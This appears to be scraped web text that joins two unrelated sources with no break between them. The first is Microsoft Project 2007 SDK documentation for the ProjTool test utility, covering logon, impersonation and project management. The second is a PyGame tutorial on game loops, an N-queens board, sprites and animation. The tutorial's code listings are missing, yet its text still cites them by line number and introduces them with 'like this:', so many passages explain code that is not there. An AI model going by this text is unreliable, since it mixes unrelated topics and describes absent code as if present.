We recommend that you back up all of the Project Server databases before you run ProjTool, and make additional database back up files after you create strategic sets of data. The source files include the CleanDBRestore.cmd script that you can use to quickly restore the Project Server database from backup files. Before you use the script, be sure to edit it to match your database names, file names, and locations.
The Project SDK download installs the ProjTool files by default in C:\2007 Office System Developer Resources\Project 2007 SDK\Code Samples\ProjTool. You can develop ProjTool on the Project Server test computer or on a remote development computer.
C:\2007 Office System Developer Resources\Project 2007 SDK\Code Samples\ProjTool
Whenever you install an updated build of Project Server, you must perform the following procedure.
To compile ProjTool:
Start Visual Studio 2005, and then open the ProjTool.sln solution file. Open Solution Explorer, and then expand the ProjTool project and the References and Web References nodes.
If you are developing on a remote computer, perform the following steps to ensure that ProjTool uses the same library assembly that Project Server uses.
Delete the Microsoft.Office.Project.Server.Library reference.
Create the directory C:\2007 Office System Developer Resources\Project 2007 SDK\Assemblies, for example, to keep assemblies you need to compile samples in the Project SDK.
C:\2007 Office System Developer Resources\Project 2007 SDK\Assemblies
Copy the Microsoft.Office.Project.Server.Library.dll assembly from your test Project Server computer to your development computer. The assembly is located in the [Program Files]\Microsoft Office Servers\12.0\Bin directory on the Project Server computer.
[Program Files]\Microsoft Office Servers\12.0\Bin
Re-add the assembly as a reference in the ProjTool Visual Studio project.
To ensure that Visual Studio creates Web service proxy assemblies that match your installed build of Project Server, delete and re-create the twelve Web references for the PSI. Right-click the ProjTool project node in Solution Explorer, and then click Add Web Reference. For the AdminWebSvc reference, for example, type, click Go, and then type the Web reference name exactly as it was previously. The namespace must match its usage in the source code. Add all of the following Web references:
AdminWebSvc
ArchiveWebSvc
CalendarWebSvc
CustomFieldsWebSvc
EventsWebSvc
LoginFormsWebSvc
LoginWindowsWebSvc
LookupTableWebSvc
ProjectWebSvc
QueueSystemWebSvc
ResourceWebSvc
SecurityWebSvc
If you change the server name, open the ProjTool Settings page (on the Project menu, click ProjTool Properties, and then click the Settings tab on the left). Change ServerName to the name of your Project Server computer in all of the values. For example, change to. Also do a case-sensitive search in all project files for the old server name and replace it with the new server name.
http://
ServerName
/_vti_bin/psi/admin.asmx
Compile ProjTool (press F6).
When you run ProjTool.exe, you can log on with Windows or Forms authentication. Before you log on with Forms authentication or use impersonation, you must save the settings. For information about impersonation, see Using Impersonation in ProjTool.
You can also log on using a Secure Sockets Layer (SSL) URL, for example, if Project Server is set up for that.
Sometimes a logon fails on the first attempt, with a message such as ReadProjectsList call failed. If the first attempt fails, a second logon usually fixes the problem, after ProjTool saves the URL and other user settings.
ReadProjectsList call failed
A ProjTool user must have a Project Server account with the same name and authentication type. The ProjTool - Project Server Logon dialog box has a Save Settings link for logging on and impersonation. You can save the settings before or after you log on.
To save settings for Forms authentication and impersonation
Click Windows for the authentication type, type the URL of your test instance of Project Web Access, and then click Logon. ProjTool opens and shows a list of all of the projects in a grid with data from the ProjectDataSet.Project table.
On the Options menu, click Settings.
In the ProjTool Settings dialog box (Figure 1), type the Project Server URL, for example,, where PWA is the name of the Project Web Access instance.
Type the name and password of the user for Forms authentication you will use most often. For example, type Administrator.
Add the port settings. The default port for Windows authentication in Project Web access is 80. The default port for Forms authentication is 81. For example, after you configure Project Web Access for Forms authentication, a typical sign-in page is.
To use impersonation, apply the following settings.
Impersonation port This is the port for the Shared Services Provider (SSP), and the default value is 56737. To locate the value for Project Web Access on your test Project Server computer, open Internet Information Services (IIS) Manager, and then expand the Web Sites node. Right-click the Office Server Web Services node. On the Web Site tab, use the TCP Port value.
Impersonation site This is the name of the SSP site, and the default name is SharedServices1.
Site ID (GUID) The site ID for Project Web Access. Determine the site ID by performing the following steps:
Open the SharePoint 3.0 Central Administration page, click the Application Management tab, and then click Create or Configure this farm's shared services.
Click the SSP site name, for example Shared Services1 (Default). On the Shared Services Administration page, click Project Web Access Sites in the Project Server section.
For the Project Web Access instance you want, pause the mouse pointer over the URL, for example,, click the down arrow in the right side of the field, and then click Edit.
Copy the GUID in the id=[GUID] URL option for the Edit Project Web Access Site page, and paste the GUID into the Site ID (GUID) text box in the ProjTool Settings dialog box. For example, an Edit Project Web Access Site page might have the following URL (the port is for the Shared Services Administration site):
id=[GUID]
You can also find the Project Web Access instance GUID in the WSS_Content database for the SSP. Open SQL Server Enterprise Manger, expand the WSS_Content_[GUID] database that contains the SSP sites, right-click the Webs table, and then open the table to return all rows. For the site with the FullUrl value PWA, for example, copy the SiteId field. Remove the braces after you paste the GUID into ProjTool Settings.
Click Save and Close.
The menu in the ProjTool main window includes the following items:
File Log on as a different user, or log on using impersonation.
New Create projects, projects from templates, custom fields, and enterprise resources.
LookupTable Create a simple lookup table, multilanguage lookup table, display lookup table values, and set languages to use for multilanguage lookup tables on the Project Server test computer.
Events Shows the Registered Project Server Event Handlers dialog box, where you can add or delete event handlers if ProjTool is running on the Project Server computer.
Tools Submenu items link to utilities that get an error description, reset the Project Server Queuing or Eventing services, restart SQL Server, reset IIS, or reset all services. ProjTool should be running on the Project Server computer.
Options Refresh the grid or clear the status messages. The Settings submenu brings up the ProjTool Settings dialog box (Figure 1).
Help Brings up the About ProjTool dialog box.
In addition to the menu items, the main window shows a series of action buttons above the project data grid (Figure 2). The buttons perform the following actions:
Delete Project Deletes one or more selected projects from both the Published and Draft databases.
Checkin Project(s) Enables you to select a simple or forced check-in of the selected projects. You can use forced check-in if a project is checked out by another user or with a different session ID.
Checkout Project(s) Enables you to check out one or more selected projects in the ProjTool main window, and check them in by using the Checkin Project(s) button. However, the session ID is not valid for checking in projects using another window, such as Project Details.
Publish Project(s) Saves projects from the Draft to the Published database. The publish process in ProjTool does not create or modify a project workspace. You can add that capability in ProjTool with additional user interface components and logic for the QueuePublishProject method. For more information about project workspaces, see How to: Create a Project Workspace and Link it to a Project.
Read Project Details Shows a dialog box with the entire ProjectDataSet data for the selected project (Figure 4). You can add tasks and make changes in the data.
If you check out the project in the main ProjTool window, and then edit data in the Project Details dialog box, you get an error when you update the data. The project is already checked out using a different session ID.
Rename Project Renames the selected project in the Draft and Published databases.
Backup / Restore Opens a dialog box that allows you to save a snapshot of each selected project in the Draft database to the Archive database. You can also restore projects from the Archive database to the Draft database.
Refresh Executes the ReadProjectsList method to repopulate the grid.
Exit Exits ProjTool.
The text box at the bottom of the main window records the status of actions, with the most recent at the top. The text box also shows XML data from SOAP errors. The status bar at the bottom of the main window shows the Project Server version number and the current date and time.
The Project Server version number shown in the status bar in Figure 2 is a build before Service Pack 1 (SP1) was released. The RTM version is 12.0.4518.1016 and the SP1 build is 12.0.6218.1000.
The Project Details dialog box in ProjTool shows the file version of the Microsoft.Office.Project.Server.Library.dll assembly. The status bar in the main ProjTool window shows the Project Server version from the ReadServerVersion PSI method. The file version of SP1 updates of Project Server assemblies is 12.0.6211.1000. The SP1 version of Microsoft Office Project Professional 2007 is also 12.0.6211.1000.
To create one or more test projects, click Projects on the New menu in the ProjTool main window. Figure 3 shows the Create ServerSide Projects dialog box. In addition to creating multiple projects, you can optionally add tasks to each project; create and add local resources of types Work, Material, and Cost; and publish the projects.
If the project name prefix is Proj and you create two projects, ProjTool increments the project names as Proj1 and Proj2.
The Project type drop-down list shows all types in the ProjectType enumeration. The only valid project types the PSI can create are Project (a standard project), Template, LightweightProject (project proposal), MasterProject, and InsertedProject. The other project types are for internal use. The enumeration value appears to the right of the drop-down list.
When you click Create Projects and then Close, the ProjTool main window shows the new projects in the grid.
To see the Project Details dialog box, select one project in the ProjTool main window grid, and then click Read Project Details (Figure 4).
The grid tabs show every DataTable in the ProjectDataSet for the project. For example, click the Task tab to show data in the TaskDataTable. The first task is the project summary task (TASK_ID = 0). If the project is not already checked out, you can add and delete tasks and set task properties. When you are finished making changes, click Update, and then click Checkin Project.
The Save DataSet to XML button saves an XML file that contains the complete contents of the ProjectDataSet that you can see in the grid tabs. To see only one field, type the field name in the Filter fields by text box. For example, type task_name; the action is case-insensitive.
To use local resources, click Add Assignment. To use enterprise resources, click Build Team.
The LookupTable menu in the ProjTool main window contains the following items.
Simple LookupTable Displays the Create and Manage LookupTables dialog box, and shows all of the data in the LookupTableDataSet in a grid with tabs for the datatables (LookupTables, LookupTableMasks, LookupTableTrees).
MultiLanguage LookupTable Creates multilanguage lookup tables for testing.
Display LookupTable Values Shows values in multilanguage lookup tables.
Set Server Language Creates Project Server database tables that can hold multilanguage lookup table data, for testing purposes (Figure 5).
You can check out, modify, update, and delete lookup tables in the Create and Manage LookupTables dialog box. With the Load Assembly and Create LT from Assembly buttons, you can open a Microsoft .NET Framework assembly and create a lookup table for testing purposes using the assembly namespace.
You can create multilanguage lookup tables on a test Project Server installation. ProjTool allows you to simulate installing multiple language database tables on the server for testing purposes. It is not necessary to install Project Server language packs to test creating multilanguage lookup tables. The languageList variable in ProjTool contains the list of active Project Server languages.
Do not run the lookup table actions, set languages, or make any changes with ProjTool on a production installation of Project Server.
To create and view a sample multilanguage lookup table:
Click Set Server Language on the LookupTable menu in the ProjTool main window.
In the Language Installer dialog box (Figure 5), check another language in addition to the Project Server primary language in Add/Remove languageList. For example, click English and French.
Type the name of the Sql Server instance that Project Server uses and set the logon properties.
Click Get DataBase List to show the list of databases.
Select the Published database in the drop-down list for the Project Web Access instance you are using.
Click Save. ProjTool creates the necessary database tables and restarts IIS. You can see the current installed languages in the list. Click Close.
Click MultiLanguage LookupTable in the LookupTable menu.
In the Create Multi-Language Lookup Tables dialog box, type a name for the lookup table. For example, type LangTest.
Select the primary LCID, for example 1033.
Check the languages you want in the Installed languages list; for example, check English and French.
Type 2 for the Number of Levels; 3 for the Values for each level; and 4 for the Values length.
Click Create and then click Close.
Click Display LookupTable Values in the LookupTable menu.
Select the lookup table in the drop-down list. For example, select LangTest.
Select the language in the drop-down list, and then click Get Values.
ProjTool creates sample characters in the LT_VALUE_TEXT field, where the number of characters is the values length and the characters are valid in the languages you used. For example, the value of the first English node is ÂÞæÛ eng 1033 and the value of the same node in French is ÂÞæÛ fra 1036.
ÂÞæÛ eng 1033
ÂÞæÛ fra 1036
To see the structure of the multilanguage lookup table that you created in ProjTool, open it in Project Web Access. On the Server Settings page, click Enterprise Custom Field Definition. On the Custom Fields and Lookup Tables page, for example, click LangTest. Project Web Access.
The ProjTool main window includes the Events menu item to help manage Project Server event handlers on a test computer. The tsEvents_Click handler for the Events menu item brings up the Registered Project Server Event Handlers dialog box.
When you click Add or Delete, ProjTool checks whether it is running on the Project Server computer. ProjTool can manage events only when it runs on the Project Server computer, because it must read and install the event handler assembly in the global assembly cache and then reset IIS.
To register a Project Server event handler, you must either register the handler assembly in the GAC or copy it to the C:\Program Files\Microsoft Office Servers\12.0\Bin\ProjectServerEventHandlers directory on the Project Server computer. In the Add Project Server Event Handlers dialog box, paste the complete reference to the event handler assembly into the textbox. For example, paste the following:
C:\Program Files\Microsoft Office Servers\12.0\Bin\ProjectServerEventHandlers
TestEventHandler, Version=1.0.0.0, Culture=Neutral, PublicKeyToken=1e3db2b86a6e0210
For more information about creating and registering Project Server event handlers, see How to: Write and Debug a Project Server Event Handler.
Because ProjTool is designed for test and development purposes only, impersonation in ProjTool requires that the user's Windows credentials match the SSP service credentials for the Project Web Access instance.
To see the SSP service credentials, open the SharePoint 3.0 Central Administration page, and then navigate from the Application Management page to the Manage this Farm's Shared Services page. Pause the mouse pointer over the SSP name (for example, SharedServices1), click the down arrow, and then click Edit Properties. For more information about developing impersonation applications, see Using Impersonation in Project Server.
To use impersonation in ProjTool, in the File menu, click Logon As. In the Project Server Advanced Logon dialog box, you can set the site ID of the Project Web Access instance and select a name from the list of enterprise resources in the drop-down list (Figure 6). When you impersonate an enterprise resource to log on, you gain the permissions of that user. This is useful for testing security for applications that integrate with Project Server. | http://msdn.microsoft.com/en-us/library/aa494895.aspx | crawl-002 | refinedweb | 3,305 | 63.49 |
17. PyGame¶
PyGame is a package that is not part of the standard Python distribution, so if you do not
already have it installed (i.e.
import pygame fails), download and install a suitable version from.
These notes are based on PyGame 1.9.1, the most recent version at the time of writing.
PyGame comes with a substantial set of tutorials, examples, and help, so there is ample opportunity to stretch yourself on the code. You may need to look around a bit to find these resources, though: if you’ve installed PyGame on a Windows machine, for example, they’ll end up in a folder like C:\Python31\Lib\site-packages\pygame\ where you will find directories for docs and examples.
17.1. The game loop¶
The structure of the games we’ll consider always follows this fixed pattern:
In every game, in the setup section we’ll create a window, load and prepare some content, and then enter the game loop. The game loop continuously does four main things:
- it polls for events — i.e. asks the system whether events have occurred — and responds appropriately,
- it updates whatever internal data structures or objects need changing,
- it draws the current state of the game into a (non-visible) surface,
- it puts the just-drawn surface on display.
This program pops up a window which stays there until we close it:
PyGame does all its drawing onto rectangular surfaces. After initializing PyGame at line 5, we create a window holding our main surface. The main loop of the game extends from line 15 to 30, with the following key bits of logic:
- First (line 16) we poll to fetch the next event that might be ready for us. This step will always be followed by some conditional statements that will determine whether any event that we’re interested in has happened. Polling for the event consumes it, as far as PyGame is concerned, so we only get one chance to fetch and use each event. On line 17 we test whether the type of the event is the predefined constant called pygame.QUIT. This is the event that we’ll see when the user clicks the close button on the PyGame window. In response to this event, we leave the loop.
- Once we’ve left the loop, the code at line 32 closes window, and we’ll return from function
main. Your program could go on to do other things, or reinitialize pygame and create another window, but it will usually just end too.
- There are different kinds of events — key presses, mouse motion, mouse clicks, joystick movement, and so on. It is usual that we test and handle all these cases with new code squeezed in before line 19. The general idea is “handle events first, then worry about the other stuff”.
- At line 20 we’d update objects or data — for example, if we wanted to vary the color, position, or size of the rectangle we’re about to draw, we’d re-assign
some_color, and
small_recthere.
- A modern way to write games (now that we have fast computers and fast graphics cards) is to redraw everything from scratch on every iteration of the game loop. So the first thing we do at line 24 is fill the entire surface with a background color. The
fillmethod of a surface takes two arguments — the color to use for filling, and the rectangle to be filled. But the second argument is optional, and if it is left out the entire surface is filled.
- In line 27 we fill a second rectangle, this time using
some_color. The placement and size of the rectangle are given by the tuple
small_rect, a 4-element tuple
(x, y, width, height).
- It is important to understand that the origin of the PyGame’s surface is at the top left corner (unlike the turtle module that puts its origin in the middle of the screen). So, if you wanted the rectangle closer to the top of the window, you need to make its y coordinate smaller.
- If your graphics display hardware tries to read from memory at the same time as the program is writing to that memory, they will interfere with each other, causing video noise and flicker. To get around this, PyGame keeps two buffers in the main surface — the back buffer that the program draws to, while the front buffer is being shown to the user. Each time the program has fully prepared its back buffer, it flips the back/front role of the two buffers. So the drawing on lines 24 and 27 does does not change what is seen on the screen until we
flipthe buffers, on line 30.
17.2. Displaying images and text¶
To draw an image on the main surface, we load the
image, say a beach ball, into its own new surface.
The main surface has a
blit method that copies
pixels from the beach ball surface into its
own surface. When we call
blit, we can specify where the beach ball should be placed
on the main surface. The term blit is widely used in computer graphics, and means
to make a fast copy of pixels from one area of memory to another.
So in the setup section, before we enter the game loop, we’d load the image, like this:
and after line 28 in the program above, we’d add this code to display our image at position (100,120):
To display text, we need do do three things. Before we enter the game loop, we
instantiate a
font object:
and after line 28, again, we use the font’s
render method to create a new surface
containing the pixels of the drawn text,
and then, as in the case for images, we blit
our new surface onto the main surface. Notice that
render
takes two extra parameters — the second tells
it whether to carefully smooth edges of the text
while drawing (this process is called anti-aliasing),
and the second is the color that
we want the text text be. Here we’ve used
(0,0,0)
which is black:
We’ll demonstrate these two new features by counting the frames — the iterations of the game loop — and keeping some timing information. On each frame, we’ll display the frame count, and the frame rate. We will only update the frame rate after every 500 frames, when we’ll look at the timing interval and can do the calculations.
The frame rate is close to ridiculous — a lot faster than one’s eye can process frames. (Commercial video games usually plan their action for 60 frames per second (fps).) Of course, our rate will drop once we start doing something a little more strenuous inside our game loop.
17.3. Drawing a board for the N queens puzzle¶
We previously solved our N queens puzzle.
For the 8x8 board, one of the solutions was the list
[6,4,2,0,5,7,1,3].
Let’s use that solution as testdata, and now use PyGame to draw that
chessboard with its queens.
We’ll create a new module for the drawing code, called
draw_queens.py. When
we have our test case(s) working, we can go back to our solver, import this new module,
and add a call to our new function to draw a board each time a solution is discovered.
We begin with a background of black and red squares for the board. Perhaps we could create an image that we could load and draw, but that approach would need different background images for different size boards. Just drawing our own red and black rectangles of the appropriate size sounds like much more fun!
Here we precompute
sq_sz, the integer
size that each square will be, so that we can fit the squares
nicely into the available window. So if
we’d like the board to be 480x480, and we’re drawing an 8x8
chessboard, then each square will need
to have a size of 60 units. But we
notice that a 7x7 board cannot
fit nicely into 480 — we’re going to
get some ugly border that our squares don’t fill exactly.
So we recompute the surface size to exactly
fit our squares before we create the window.
Now let’s draw the squares, in the game loop. We’ll need a nested loop: the outer loop will run over the rows of the chessboard, the inner loop over the columns:
There are two important ideas in this code: firstly,
we compute the rectangle to be filled
from the
row and
col loop variables,
multiplying them by the size of the square to
get their position. And, of course, each
square is a fixed width and height. So
the_square
represents the rectangle to be filled on the
current iteration of the loop. The second idea
is that we have to alternate colors on
every square. In the earlier setup code we created
a list containing two colors, here we
manipulate
c_indx (which will always either have
the value 0 or 1) to start each row on a
color that is different from the previous row’s
starting color, and to switch colors each
time a square is filled.
This (together with the other fragments not shown to flip the surface onto the display) leads to the pleasing backgrounds like this, for different size boards:
Now, on to drawing the queens! Recall that our
solution
[6,4,2,0,5,7,1,3] means that
in column 0 of the board we want a queen at
row 6, at column 1 we want a queen at row 4,
and so on. So we need a loop running over each queen:
In this chapter we already have a beach ball image, so we’ll use that for our queens. In the setup code before our game loop, we load the ball image (as we did before), and in the body of the loop, we add the line:
We’re getting there, but those queens need to be centred in their squares! Our problem arises from the fact that both the ball and the rectangle have their upper left corner as their reference points. If we’re going to centre this ball in the square, we need to give it an extra offset in both the x and y direction. (Since the ball is round and the square is square, the offset in the two directions will be the same, so we’ll just compute a single offset value, and use it in both directions.)
The offset we need is half the (size of the square less the size of the ball). So we’ll precompute this in the game’s setup section, after we’ve loaded the ball and determined the square size:
Now we touch up the drawing code for the ball and we’re done:
We might just want to think about what would happen if the ball was bigger than
the square. In that case,
ball_offset would become negative.
So it would still be centered in the square - it would just spill
over the boundaries, or perhaps obscure the square entirely!
Here is the complete program:
There is one more thing worth reviewing here. The conditional statement on line
50 tests whether the name of the currently executing program is
__main__.
This allows us to distinguish whether this module is being run as a main program,
or whether it has been imported elsewhere, and used as a module. If we run this
module in Python, the test cases in lines 51-54 will be executed. However, if we
import this module into another program (i.e. our N queens solver from earlier)
the condition at line 50 will be false, and the statements on lines 51-54 won’t run.
In the section Eight Queens puzzle, part 2 our main program looked like this:
Now we just need two changes. At the top of that program, we
import the module that we’ve been working on here (assume we
called it
draw_queens). (You’ll have to ensure that the
two modules are saved in the same folder.) Then after line 10
here we add a call to draw the solution that we’ve just discovered:
draw_queens.draw_board(bd)
And that gives a very satisfying combination of program that can search for solutions to the N queens problem, and when it finds each, it pops up the board showing the solution.
17.4. Sprites¶
A sprite is an object that can move about in a game, and has internal behaviour and state of its own. For example, a spaceship would be a sprite, the player would be a sprite, and bullets and bombs would all be sprites.
Object oriented programming (OOP) is ideally suited to a situation like this: each object can have its own attributes and internal state, and a couple of methods. Let’s have some fun with our N queens board. Instead of placing the queen in her final position, we’d like to drop her in from the top of the board, and let her fall into position, perhaps bouncing along the way.
The first encapsulation we need is to turn each of our queens into an object. We’ll keep a list of all the active sprites (i.e. a list of queen objects), and arrange two new things in our game loop:
- After handling events, but before drawing, call an
updatemethod on every sprite. This will give each sprite a chance to modify its internal state in some way — perhaps change its image, or change its position, or rotate itself, or make itself grow a bit bigger or a bit smaller.
- Once all the sprites have updated themselves, the game loop can begin drawing - first the background, and then call a
drawmethod on each sprite in turn, and delegate (hand off) the task of drawing to the object itself. This is in line with the OOP idea that we don’t say “Hey, draw, show this queen!”, but we prefer to say “Hey, queen, draw yourself!”.
We start with a simple object, no movement or animation yet, just scaffolding, to see how to fit all the pieces together:
We’ve given the sprite three attributes: an image to be drawn,
a target position, and a current position. If we’re going to
move the spite about, the current position may need to be
different from the target, which is where we want the queen
finally to end up. In this code at this time we’ve done nothing
in the
update method, and our
draw method (which
can probably remain this simple in future) simply draws itself
at its current position on the surface that is provided
by the caller.
With its class definition in place, we now instantiate our N queens,
put them into a list of sprites, and arrange for the game loop to call
the
update and
draw methods on each frame. The new bits of
code, and the revised game loop look like this:
This works just like it did before, but our extra work in making objects for the queens has prepared the way for some more ambitious extensions.
Let us begin with a falling queen object. At any instant, it will have a
velocity i.e. a speed, in a certain direction.
(We are only working with movement in the y direction, but use your imagination!)
So in the object’s
update method, we want to change its current position by its velocity.
If our N queens board is floating in space, velocity would stay constant, but hey, here on
Earth we have gravity! Gravity changes the velocity on each time interval, so we’ll want a ball
that speeds up as it falls further. Gravity will be constant for all queens, so we won’t keep
it in the instances — we’ll just make it a variable in our module. We’ll make one other
change too: we will start every queen at the top of the board, so that it can fall towards
its target position. With these changes, we now get the following:
Making these changes gives us a new chessboard in which each queen starts at the top of its column, and speeds up, until it drops off the bottom of the board and disappears forever. A good start — we have movement!
The next step is to get the ball to bounce when it reaches its own target position. It is pretty easy to bounce something — you just change the sign of its velocity, and it will move at the same speed in the opposite direction. Of course, if it is travelling up towards the top of the board it will be slowed down by gravity. (Gravity always sucks down!) And you’ll find it bounces all the way up to where it began from, reaches zero velocity, and starts falling all over again. So we’ll have bouncing balls that never settle.
A realistic way to settle the object is to lose some energy (probably to friction) each time it bounces — so instead of simply reversing the sign of the velocity, we multiply it by some fractional factor — say -0.65. This means the ball only retains 65% of its energy on each bounce, so it will, as in real life, stop bouncing after a short while, and settle on its “ground”.
The only changes are in the
update method, which now looks like this:
Heh, heh, heh! We’re not going to show animated screenshots, so copy the code into your Python environment and see for yourself.
17.5. Events¶
The only kind of event we’re handled so far has been the QUIT event. But we can also detect keydown and keyup events, mouse motion, and mousebutton down or up events. Consult the PyGame documentation and follow the link to Event.
When your program polls for and receives an event object from PyGame, its event type will determine what secondary information is available. Each event object carries a dictionary (which you may only cover in due course in these notes). The dictionary holds certain keys and values that make sense for the type of event.
For example, if the type of event is MOUSEMOTION, we’ll be able to find the mouse position and information about the state of the mouse buttons in the dictionary attached to the event. Similarly, if the event is KEYDOWN, we can learn from the dictionary which key went down, and whether any modifier keys (shift, control, alt, etc.) are also down. You also get events when the game window becomes active (i.e. gets focus) or loses focus.
The event object with type NOEVENT is returned if there are no events waiting. Events can be printed, allowing you to experiment and play around. So dropping these lines of code into the game loop directly after polling for any event is quite informative:
With this is place, hit the space bar and the escape key, and watch the events you get. Click your three mouse buttons. Move your mouse over the window. (This causes a vast cascade of events, so you may also need to filter those out of the printing.) You’ll get output that looks something like this:
<Event(17-VideoExpose {})> <Event(1-ActiveEvent {'state': 1, 'gain': 0})> <Event(2-KeyDown {'scancode': 57, 'key': 32, 'unicode': ' ', 'mod': 0})> <Event(3-KeyUp {'scancode': 57, 'key': 32, 'mod': 0})> <Event(2-KeyDown {'scancode': 1, 'key': 27, 'unicode': '\x1b', 'mod': 0})> <Event(3-KeyUp {'scancode': 1, 'key': 27, 'mod': 0})> ... <Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (323, 194), 'rel': (-3, -1)})> <Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (322, 193), 'rel': (-1, -1)})> <Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (321, 192), 'rel': (-1, -1)})> <Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (319, 192), 'rel': (-2, 0)})> <Event(5-MouseButtonDown {'button': 1, 'pos': (319, 192)})> <Event(6-MouseButtonUp {'button': 1, 'pos': (319, 192)})> <Event(4-MouseMotion {'buttons': (0, 0, 0), 'pos': (319, 191), 'rel': (0, -1)})> <Event(5-MouseButtonDown {'button': 2, 'pos': (319, 191)})> <Event(5-MouseButtonDown {'button': 5, 'pos': (319, 191)})> <Event(6-MouseButtonUp {'button': 5, 'pos': (319, 191)})> <Event(6-MouseButtonUp {'button': 2, 'pos': (319, 191)})> <Event(5-MouseButtonDown {'button': 3, 'pos': (319, 191)})> <Event(6-MouseButtonUp {'button': 3, 'pos': (319, 191)})> ... <Event(1-ActiveEvent {'state': 1, 'gain': 0})> <Event(12-Quit {})>
So let us now make these changes to the code near the top of our game loop:
Lines 7-16 show typical processing for a KEYDOWN event — if a key has gone down, we test which key it is, and take some action. With this in place, we have another way to quit our queens program — by hitting the escape key. Also, we can use keys to change the color of the board that is drawn.
Finally, at line 20, we respond (pretty lamely) to the mouse button going down.
As a final exercise in this section, we’ll write a better response handler to mouse clicks. What we will do is figure out if the user has clicked the mouse on one of our sprites. If there is a sprite under the mouse when the click occurs, we’ll send the click to the sprite and let it respond in some sensible way.
We’ll begin with some code that finds out which sprite is under the clicked position, perhaps none!
We add a method to the class,
contains_point, which returns True if the point is within
the rectangle of the sprite:
Now in the game loop, once we’ve seen the mouse event, we determine which queen, if any, should be told to respond to the event:
And the final thing is to write a new method called
handle_click in the
QueenSprite class.
When a sprite is clicked, we’ll just add some velocity in the up direction,
i.e. kick it back into the air.
With these changes we have a playable game! See if you can keep all the balls on the move, not allowing any one to settle!
17.6. A wave of animation¶
Many games have sprites that are animated: they crouch, jump and shoot. How do they do that?
Consider this sequence of 10 images: if we display them in quick succession, Duke will wave at us. (Duke is a friendly visitor from the kingdom of Javaland.)
A compound image containing smaller patches which are intended for animation is
called a sprite sheet. Download this sprite sheet by right-clicking in your browser
and saving it in your working directory with the name
duke_spritesheet.png.
The sprite sheet has been quite carefully prepared: each of the 10 patches are spaced exactly 50 pixels apart. So, assuming we want to draw patch number 4 (numbering from 0), we want to draw only the rectangle that starts at x position 200, and is 50 pixels wide, within the sprite sheet. Here we’ve shown the patches and highlighted the patch we want to draw.
The
blit method we’ve been using — for copying pixels from one surface to another —
can copy a sub-rectangle of the source surface. So the grand idea here is that
each time we draw Duke, we won’t blit the whole sprite sheet. Instead we’ll provide an extra
rectangle argument that determines which portion of the sprite sheet will be blitted.
We’re going to add new code in this section to our existing N queens drawing game. What we want is to put some instances of Duke on the chessboard somewhere. If the user clicks on one of them, we’ll get him to respond by waving back, for one cycle of his animation.
But before we do that, we need another change. Up until now, our game loop has been running at really fast frame rates that are unpredictable. So we’ve chosen some magic numbers for gravity and for bouncing and kicking the ball on the basis of trial-and-error. If we’re going to start animating more sprites, we need to tame our game loop to operate at a fixed, known frame rate. This will allow us to plan our animation better.
PyGame gives us the tools to do this in just two lines of code. In the setup section of
the game, we instantiate a new
Clock object:
and right at the bottom of the game loop, we call a method on this object that limits the frame rate to whatever we specify. So let’s plan our game and animation for 60 frames per second, by adding this line at the bottom of our game loop:
You’ll find that you have to go back and adjust the numbers for gravity and kicking the ball now, to match this much slower frame rate. When we plan an animation so that it only works sensibly at a fixed frame rate, we say that we’ve baked the animation. In this case we’re baking our animations for 60 frames per second.
To fit into the existing framework that we
already have for our queens board, we want to create
a
DukeSprite class that has all the same
methods as the
QueenSprite class. Then we can
add one or more Duke instances onto our list of
all_sprites, and our existing game loop will then
call methods of the Duke instance. Let us start with
skeleton scaffolding for the new class:
The only changes we’ll need to the existing game are all in the setup section. We load up the new sprite sheet and instantiate a couple of instances of Duke, at the positions we want on the chessboard. So before entering the game loop, we add this code:
Now the game loop will test if each instance has been clicked, will call
the click handler for that instance. It will also call update and draw for all sprites.
All the remaining changes we need to make will be made in the methods of the
DukeSprite class.
Let’s begin with drawing one of the patches. We’ll introduce a new attribute
curr_patch_num
into the class. It holds a value between 0 and 9, and determines which patch to draw. So
the job of the
draw method is to compute the sub-rectangle of the patch to be drawn, and
to blit only that portion of the spritesheet:
Now on to getting the animation to work. We need to arrange logic in
update
so that if we’re busy animating, we change the
curr_patch_num every so
often, and we also decide when to bring Duke back to his rest position, and
stop the animation. An important issue is that the game loop frame rate —
in our case 60 fps — is not the same as the animation rate —
the rate at which we want to change
Duke’s animation patches. So we’ll plan Duke wave’s animation cycle
for a duration of 1 second. In other words, we want to play out Duke’s
10 animation patches over 60 calls to
update. (This is how the baking
of the animation takes place!) So we’ll keep another animation frame
counter in the class, which will be zero when we’re not animating, and
each call to
update will increment the counter up to 59, and then
back to 0. We can then divide that animation counter by 6, to set the
curr_patch_num variable to select the patch we want to show.
Notice that if
anim_frame_count is zero, i.e. Duke is at rest, nothing
happens here. But if we start the counter running, it will count up
to 59 before settling back to zero. Notice also, that because
anim_frame_count
can only be a value between 0 and 59, the
curr_patch_num will
always stay between 0 and 9. Just what we require!
Now how do we trigger the animation, and start it running? On the mouse click.
Two things of interest here. We only start the animation if Duke is at rest.
Clicks on Duke while he is already waving get ignored. And when we do start the
animation, we set the counter to 5 — this means that on the very next call to
update the counter becomes 6, and the image changes. If
we had set the counter to 1, we would have needed to wait for 5 more calls to
update before anything happened — a slight lag, but enough to make things
feel sluggish.
The final touch-up is to initialize our two new attributes when we instantiate the class. Here is the code for the whole class now:
Now we have two extra Duke instances on our chessboard, and clicking on either causes that instance to wave.
17.7. Aliens - a case study¶
Find the example games with the PyGame package, (On a windows system, something like C:\Python3\Lib\site-packages\pygame\examples) and play the Aliens game. Then read the code, in an editor or Python environment that shows line numbers.
It does a number of much more advanced things that we do, and relies on the PyGame framework for more of its logic. Here are some of the points to notice:
- The frame rate is deliberately constrained near the bottom of the game loop at line 311. If we change that number we can make the game very slow or unplayably fast!
- There are different kinds of sprites: Explosions, Shots, Bombs, Aliens and a Player. Some of these have more than one image — by swapping the images, we get animation of the sprites, i.e. the Alien spacecraft lights change, and this is done at line 112.
- Different kinds of objects are referenced in different groups of sprites, and PyGame helps maintain these. This lets the program check for collisions between, say, the list of shots fired by the player, and the list of spaceships that are attacking. PyGame does a lot of the hard work for us.
- Unlike our game, objects in the Aliens game have a limited lifetime, and have to get killed. For example, if we shoot, a Shot object is created — if it reaches the top of the screen without expoding against anything, it has to be removed from the game. Lines 141-142 do this. Similarly, when a falling bomb gets close to the ground (line 156), it instantiates a new Explosion sprite, and the bomb kills itself.
